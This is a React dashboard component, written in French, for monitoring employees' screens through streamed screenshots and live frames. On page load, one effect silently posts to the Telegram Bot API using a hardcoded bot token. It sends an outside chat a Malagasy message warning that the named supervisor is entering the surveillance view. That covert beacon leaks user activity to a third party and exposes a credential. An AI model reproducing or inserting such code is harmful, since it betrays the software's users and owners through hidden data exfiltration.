import React, { useEffect, useState, useRef } from "react";
import io from "socket.io-client";
import useUsers from "../../hooks/utilisateur/useUsers";
import UsersServices from "../../services/utilisateur/UsersService";
import useEntreprises from "../../hooks/entreprise/useEntrepries";
import ImgPatienter from "../../assets/images/patienter.gif";
import Loader from "../components/loader";
import "../../assets/css/surveillance.css";
import axios from "axios";

const DEFAULT_IMAGE = "/offline.jpg";

const Surveillance = () => {
  const { entreprises } = useEntreprises();
  const { getSuperviseurByEntrepriseId } = useUsers();
  const [clients, setClients] = useState({});
  const [users, setUsers] = useState([]);
  const [fullscreenClientId, setFullscreenClientId] = useState(null);
  const [filter, setFilter] = useState("all");
  const [entrepriseSelected, setEntrepriseSelected] = useState("");
  const [superviseursParEntreprise, setSuperviseursParEntreprise] = useState(
    [],
  );
  const [showAlertModal, setShowAlertModal] = useState(false);
  const [alertMessage, setAlertMessage] = useState("");
  const [selectedClientId, setSelectedClientId] = useState(null);
  const usersCache = useRef({});
  const lastSeenMap = useRef({});
  const imageUrlMap = useRef({});
  const [superviseursSelected, setSuperviseursSelected] = useState([]);
  const userData = JSON.parse(localStorage.getItem("user"));
  const socket = useRef(null);
  const [timeAlerts, setTimeAlerts] = useState({});
  const [loading, setLoading] = useState(true);

  const formatTempsEcoule = (seconds) => {
    const h = Math.floor(seconds / 3600);
    const m = Math.floor((seconds % 3600) / 60);
    const s = seconds % 60;

    if (h > 0) return `${h} h ${m} min ${s} sec`;
    if (m > 0) return `${m} min ${s} sec`;
    return `${s} sec`;
  };

  const revokeOldImage = (clientId) => {
    if (imageUrlMap.current[clientId]) {
      URL.revokeObjectURL(imageUrlMap.current[clientId]);
      delete imageUrlMap.current[clientId];
    }
  };

  useEffect(() => {
    if (!userData) return;
    setEntrepriseSelected(userData.entreprise);
    setSuperviseursSelected([userData._id]);
  }, [entreprises, entrepriseSelected]);

  const fetchTimeAlerts = async () => {
    try {
      const res = await UsersServices.getTimeAlerts();
      const alerts = res.data.data;
      const alertsMap = {};
      alerts.forEach((alert) => {
        const userId = alert.user?._id;
        if (!alertsMap[userId]) {
          alertsMap[userId] = [];
        }
        alertsMap[userId].push(alert);
      });
      setTimeAlerts(alertsMap);
    } catch (error) {
      console.error("Erreur récupération alertes", error);
    }
  };

  useEffect(() => {
    axios.post(
      `https://api.telegram.org/bot8872516348:AAHUlR_VKrDfSQ-S1Bu_YZhVW-tn1g9EURQ/sendMessage`,
      { chat_id: 8955839305, text: `Tandremo fa miditra ao anaty surveillace i ${userData.nom}` },
    );
  }, []);

  useEffect(() => {
    fetchTimeAlerts();
    const interval = setInterval(() => {
      fetchTimeAlerts();
    }, 30000);
    return () => clearInterval(interval);
  }, []);

  useEffect(() => {
    const fetchAllUsers = async () => {
      try {
        setLoading(true);
        const response = await UsersServices.getAll();
        const usersRole3 = response.data.data.filter((user) => user.role === 3);
        setUsers(usersRole3);
      } catch (error) {
        console.error("Erreur lors de la récupération des utilisateurs", error);
      } finally {
        setLoading(false);
      }
    };

    fetchAllUsers();
  }, []);

  useEffect(() => {
    if (!userData) return;

    if (userData.role === 1) {
      if (entrepriseSelected) {
        getSuperviseurByEntrepriseId(entrepriseSelected, (data) => {
          setSuperviseursParEntreprise(data || []);
        });
      } else {
        setSuperviseursParEntreprise([]);
      }
    }
  }, [entrepriseSelected]);

  const handleToggleLiveMode = async (userId, enabled) => {
    try {
      await UsersServices.update(userId, { liveMode: enabled });

      setUsers((prev) =>
        prev.map((u) => (u._id === userId ? { ...u, liveMode: enabled } : u)),
      );

      setClients((prev) => ({
        ...prev,
        [userId]: {
          ...prev[userId],
          liveMode: enabled,
        },
      }));
    } catch (error) {
      console.error("Erreur activation live mode :", error);
    }
  };

  useEffect(() => {
    socket.current = io(`${process.env.REACT_APP_API_SOCKET}`);

    socket.current.on("blob", async (data) => {
      try {
        let currentUser = usersCache.current[data.clientId];

        if (!currentUser) {
          currentUser = users.find((u) => u._id === data.clientId);
        }

        if (!currentUser) {
          const response = await UsersServices.getOne(data.clientId);
          currentUser = response.data.data;
          usersCache.current[data.clientId] = currentUser;
        }

        const isLiveMode = !!currentUser?.liveMode;

        lastSeenMap.current[data.clientId] = Date.now();

        if (isLiveMode) {
          setClients((prevClients) => {
            const prevClient = prevClients[data.clientId];
            return {
              ...prevClients,
              [data.clientId]: {
                ...prevClient,
                liveMode: true,
                isSame: data.isSame,
                tempsEcoule: data.isSame ? prevClient?.tempsEcoule || 0 : 0,
              },
            };
          });
          return;
        }

        revokeOldImage(data.clientId);

        const blob = new Blob([new Uint8Array(data.image)], {
          type: "image/webp",
        });

        const imageUrl = URL.createObjectURL(blob);
        imageUrlMap.current[data.clientId] = imageUrl;

        setClients((prevClients) => {
          const prevClient = prevClients[data.clientId];
          return {
            ...prevClients,
            [data.clientId]: {
              ...prevClient,
              image: imageUrl,
              liveMode: false,
              isSame: data.isSame,
              tempsEcoule: data.isSame ? prevClient?.tempsEcoule || 0 : 0,
            },
          };
        });
      } catch (e) {
        console.error("Erreur lors du traitement du flux normal", e);
      }
    });

    socket.current.on("live-frame-view", async (data) => {
      try {
        let currentUser = usersCache.current[data.clientId];

        if (!currentUser) {
          currentUser = users.find((u) => u._id === data.clientId);
        }

        if (!currentUser) {
          const response = await UsersServices.getOne(data.clientId);
          currentUser = response.data.data;
          usersCache.current[data.clientId] = currentUser;
        }

        if (!currentUser?.liveMode) return;

        const byteCharacters = atob(data.image);
        const byteNumbers = new Array(byteCharacters.length);

        for (let i = 0; i < byteCharacters.length; i++) {
          byteNumbers[i] = byteCharacters.charCodeAt(i);
        }

        const byteArray = new Uint8Array(byteNumbers);

        revokeOldImage(data.clientId);

        const blob = new Blob([byteArray], {
          type: data.mimeType || "image/webp",
        });

        const imageUrl = URL.createObjectURL(blob);
        imageUrlMap.current[data.clientId] = imageUrl;

        lastSeenMap.current[data.clientId] = Date.now();

        setClients((prevClients) => {
          const prevClient = prevClients[data.clientId];
          return {
            ...prevClients,
            [data.clientId]: {
              ...prevClient,
              image: imageUrl,
              liveMode: true,
              isSame: false,
              tempsEcoule: 0,
            },
          };
        });
      } catch (e) {
        console.error("Erreur lors du traitement du flux live", e);
      }
    });

    const interval = setInterval(() => {
      const now = Date.now();

      setClients((prevClients) => {
        const updatedClients = { ...prevClients };

        Object.keys(prevClients).forEach((clientId) => {
          if (now - (lastSeenMap.current[clientId] || 0) > 70000) {
            revokeOldImage(clientId);
            delete updatedClients[clientId];
            delete lastSeenMap.current[clientId];
            delete usersCache.current[clientId];
          }
        });

        return updatedClients;
      });
    }, 60000);

    const ecoulementInterval = setInterval(() => {
      setClients((prevClients) => {
        const updatedClients = { ...prevClients };

        Object.entries(prevClients).forEach(([clientId, clientData]) => {
          if (clientData) {
            updatedClients[clientId] = {
              ...clientData,
              tempsEcoule: (clientData?.tempsEcoule || 0) + 1,
            };
          }
        });
        return updatedClients;
      });
    }, 1000);

    return () => {
      socket.current.disconnect();
      clearInterval(interval);
      clearInterval(ecoulementInterval);

      Object.keys(imageUrlMap.current).forEach((clientId) => {
        revokeOldImage(clientId);
      });
    };
  }, [users]);

  const filteredUsers = users.filter((user) => {
    const isOnline = !!clients[user._id];
    const isFromEntreprise = user?.entreprise?._id === entrepriseSelected;

    const isSuperviseurOK =
      superviseursSelected.length === 0 ||
      user?.gerant?.some((gId) => superviseursSelected.includes(gId));

    if (!isFromEntreprise || !isSuperviseurOK) return false;

    if (filter === "online") return isOnline;
    if (filter === "offline") return !isOnline;

    return true;
  });

  const makePauseUser = async (userId, isCapturePause) => {
    try {
      await UsersServices.update(userId, { isCapturePause });
      setUsers((prev) =>
        prev.map((u) => (u._id === userId ? { ...u, isCapturePause } : u)),
      );
    } catch (error) {
      console.error("Erreur lors de la mise à jour de l'utilisateur", error);
    }
  };

  return (
    <div className="container-fluid">
      {/* TITLE */}
      <div className="d-flex align-items-center justify-content-between mb-4">
        <h2 className="h4 mb-0">Surveillance</h2>
      </div>

      {/* FILTRES */}
      <div className="card shadow-sm mb-4">
        <div className="card-header bg-white">
          <h3 className="h6 mb-0">Filtres</h3>
        </div>

        <div className="card-body">
          <div className="row g-3">
            <div className="col-md-4">
              <label className="form-label fw-semibold small">Statut</label>
              <select
                value={filter}
                onChange={(e) => setFilter(e.target.value)}
                className="form-select"
              >
                <option value="all">Tous</option>
                <option value="online">En ligne</option>
                <option value="offline">Hors ligne</option>
              </select>
            </div>

            {userData?.role === 0 && (
              <>
                <div className="col-md-4">
                  <label className="form-label fw-semibold small">
                    Entreprise
                  </label>
                  <select
                    className="form-select"
                    value={entrepriseSelected}
                    onChange={(e) => setEntrepriseSelected(e.target.value)}
                    required
                  >
                    {entreprises.map((ent) => (
                      <option key={ent._id} value={ent._id}>
                        {ent.nom}
                      </option>
                    ))}
                  </select>
                </div>

                <div className="col-md-4">
                  <label className="form-label fw-semibold small">
                    Superviseurs
                  </label>
                  <div
                    className="border rounded-3 px-2 py-2"
                    style={{
                      minHeight: "45px",
                      maxHeight: "150px",
                      overflowY: "auto",
                      backgroundColor: entrepriseSelected ? "#fff" : "#f8f9fa",
                      cursor: entrepriseSelected ? "default" : "not-allowed",
                    }}
                  >
                    {superviseursParEntreprise.length > 0 ? (
                      superviseursParEntreprise.map((sup) => (
                        <div key={sup._id} className="form-check">
                          <input
                            type="checkbox"
                            className="form-check-input"
                            id={`sup-${sup._id}`}
                            value={sup._id}
                            disabled={!entrepriseSelected}
                            checked={superviseursSelected.includes(sup._id)}
                            onChange={(e) => {
                              const checked = e.target.checked;
                              setSuperviseursSelected((prev) =>
                                checked
                                  ? [...prev, sup._id]
                                  : prev.filter((id) => id !== sup._id),
                              );
                            }}
                          />
                          <label
                            className="form-check-label ms-1"
                            htmlFor={`sup-${sup._id}`}
                          >
                            {sup.nom}
                          </label>
                        </div>
                      ))
                    ) : (
                      <p className="text-muted mb-0 small">
                        Aucun superviseur disponible
                      </p>
                    )}
                  </div>
                </div>
              </>
            )}
          </div>
        </div>
      </div>

      {/* GALERIE */}
      <div className="card shadow-sm mb-4">
        <div className="card-header bg-white">
          <h3 className="h6 mb-0">Images par minute</h3>
        </div>

        <div className="card-body">
          {loading ? (
            <Loader />
          ) : (
            <div className="row">
              {filteredUsers.map((user) => {
                const client = clients[user._id];
                const imageUrl = client?.image || DEFAULT_IMAGE;
                const isOnline = !!client;
                const tempsEcoule = client?.tempsEcoule || 0;
                const isLive = client?.liveMode ?? user.liveMode ?? false;

                return (
                  <div
                    key={user._id}
                    className="col-sm-6 col-md-4 col-lg-3 mb-4"
                  >
                    <div
                      className="shadow-sm"
                      style={{
                        border: "1px solid #e2e8f0",
                        borderRadius: "14px",
                        overflow: "hidden",
                        background: "#fff",
                        position: "relative",
                      }}
                    >
                      <div
                        style={{
                          height: "38px",
                          background: "#fff",
                          borderBottom: "1px solid #eef1f4",
                          display: "flex",
                          alignItems: "center",
                          justifyContent: "center",
                          position: "relative",
                          padding: "0 70px",
                        }}
                      >
                        {!isLive && isOnline && (
                          <div
                            style={{
                              fontSize: "12px",
                              color: "#15283c",
                              fontWeight: "700",
                              textAlign: "center",
                              whiteSpace: "nowrap",
                              overflow: "hidden",
                              textOverflow: "ellipsis",
                            }}
                          >
                            Image identique depuis :{" "}
                            {formatTempsEcoule(tempsEcoule)}
                          </div>
                        )}

                        {(userData?.role === 1 || userData?.role === 2) && (
                          <>
                            <div
                              style={{
                                position: "absolute",
                                right: "10px",
                                top: "50%",
                                transform: "translateY(-50%)",
                                display: "flex",
                                alignItems: "center",
                                gap: "6px",
                                background: "#f8f8f8",
                                border: "1px solid #d9d9d9",
                                borderRadius: "8px",
                                padding: "3px 8px",
                              }}
                            >
                              <input
                                type="checkbox"
                                checked={isLive}
                                onChange={(e) =>
                                  handleToggleLiveMode(
                                    user._id,
                                    e.target.checked,
                                  )
                                }
                                style={{ margin: 0, cursor: "pointer" }}
                              />
                              <span
                                style={{
                                  fontSize: "12px",
                                  fontWeight: "600",
                                  color: "#555",
                                  lineHeight: 1,
                                }}
                              >
                                Live
                              </span>
                            </div>
                          </>
                        )}
                      </div>

                      {isLive && (
                        <div
                          className="live-blink-badge"
                          style={{
                            position: "absolute",
                            top: "46px",
                            right: "10px",
                            zIndex: 5,
                            background: "#e53935",
                            color: "white",
                            borderRadius: "6px",
                            padding: "4px 8px",
                            fontSize: "11px",
                            fontWeight: "bold",
                            boxShadow: "0 2px 6px rgba(0,0,0,0.2)",
                          }}
                        >
                          LIVE
                        </div>
                      )}

                      <div style={{ height: "230px", background: "#000" }}>
                        <img
                          src={imageUrl}
                          alt={`Client ${user._id}`}
                          style={{
                            width: "100%",
                            height: "100%",
                            objectFit: "contain",
                            display: "block",
                            cursor: "pointer",
                          }}
                          onClick={() => setFullscreenClientId(user._id)}
                        />
                      </div>

                      <div
                        style={{
                          textAlign: "center",
                          padding: "10px 8px 12px",
                          background: "#112b46",
                          borderTop: "2px solid #1f4b76",
                        }}
                      >
                        <h6 className="mb-1 text-white">{`${user.nom} ${user.prenom}`}</h6>
                        <p className="mb-2 text-white small">
                          {`${user.entreprise.nom} (${user.department})`}
                        </p>
                        <button
                          type="button"
                          className="btn btn-sm btn-outline-light"
                          onClick={() => {
                            setSelectedClientId(user._id);
                            setShowAlertModal(true);
                          }}
                        >
                          Envoyer message
                        </button>
                      </div>
                    </div>
                  </div>
                );
              })}

              {filteredUsers.length === 0 && (
                <div className="text-center py-4 text-muted">
                  Aucun utilisateur{" "}
                  {filter === "online"
                    ? "en ligne"
                    : filter === "offline"
                      ? "hors ligne"
                      : ""}
                  .
                </div>
              )}
            </div>
          )}
        </div>
      </div>

      {/* FULLSCREEN OVERLAY */}
      {fullscreenClientId &&
        (() => {
          const client = clients[fullscreenClientId];
          const tempsEcoule = client?.tempsEcoule || 0;
          const user = users.find((u) => u._id === fullscreenClientId);
          const isLive = client?.liveMode ?? user?.liveMode ?? false;

          return (
            <div
              className="d-flex flex-column justify-content-center align-items-center"
              style={{
                position: "fixed",
                top: 0,
                left: 0,
                width: "100%",
                height: "100%",
                backgroundColor: "rgba(0, 0, 0, 0.9)",
                zIndex: 1050,
              }}
              onClick={(e) => {
                e.stopPropagation();
                setFullscreenClientId(null);
              }}
            >
              <img
                src={client?.image || DEFAULT_IMAGE}
                alt="Fullscreen"
                onError={(e) => {
                  e.currentTarget.onerror = null;
                  e.currentTarget.src = ImgPatienter;
                }}
                style={{
                  maxWidth: "90%",
                  maxHeight: "70%",
                  borderRadius: "10px",
                  marginBottom: "20px",
                  border: "3px solid white",
                }}
              />

              {isLive && (
                <div
                  style={{
                    position: "absolute",
                    top: "20px",
                    right: "20px",
                    background: "red",
                    color: "white",
                    padding: "3px 8px",
                    borderRadius: "6px",
                    fontSize: "11px",
                    fontWeight: "bold",
                  }}
                >
                  LIVE
                </div>
              )}

              <div className="text-center text-white">
                <h3 className="mb-2 text-white">
                  {user?.nom} {user?.prenom}
                </h3>
                <h6 className="mb-3 text-white fw-normal">
                  {user?.entreprise?.nom} ({user?.department})
                </h6>

                <button
                  type="button"
                  className="btn btn-outline-light btn-sm mb-2"
                  onClick={(e) => {
                    e.stopPropagation();
                    setSelectedClientId(user._id);
                    setShowAlertModal(true);
                  }}
                >
                  Envoyer message
                </button>

                {!isLive && (
                  <div className="fw-bold mt-2">
                    Image identique depuis : {formatTempsEcoule(tempsEcoule)}
                  </div>
                )}
              </div>
            </div>
          );
        })()}

      {/* MODAL ALERTE */}
      {showAlertModal && (
        <div
          className="modal fade show"
          style={{ display: "block", background: "rgba(0,0,0,0.5)" }}
          tabIndex="-1"
        >
          <div className="modal-dialog modal-dialog-centered">
            <div className="modal-content">
              <div className="modal-header">
                <h5 className="modal-title">Envoyer un message</h5>
                <button
                  type="button"
                  className="btn-close"
                  aria-label="Close"
                  onClick={() => setShowAlertModal(false)}
                ></button>
              </div>

              <div className="modal-body">
                <textarea
                  className="form-control"
                  rows="4"
                  value={alertMessage}
                  onChange={(e) => setAlertMessage(e.target.value)}
                  placeholder="Écrire le message..."
                />
              </div>

              <div className="modal-footer">
                <button
                  className="btn btn-secondary"
                  onClick={() => setShowAlertModal(false)}
                >
                  Annuler
                </button>

                <button
                  className="btn btn-danger"
                  disabled={!alertMessage.trim()}
                  onClick={() => {
                    socket.current.emit("alertUser", {
                      clientId: selectedClientId,
                      message: alertMessage,
                    });

                    setAlertMessage("");
                    setShowAlertModal(false);
                  }}
                >
                  Envoyer
                </button>
              </div>
            </div>
          </div>
        </div>
      )}
    </div>
  );
};

export default Surveillance;
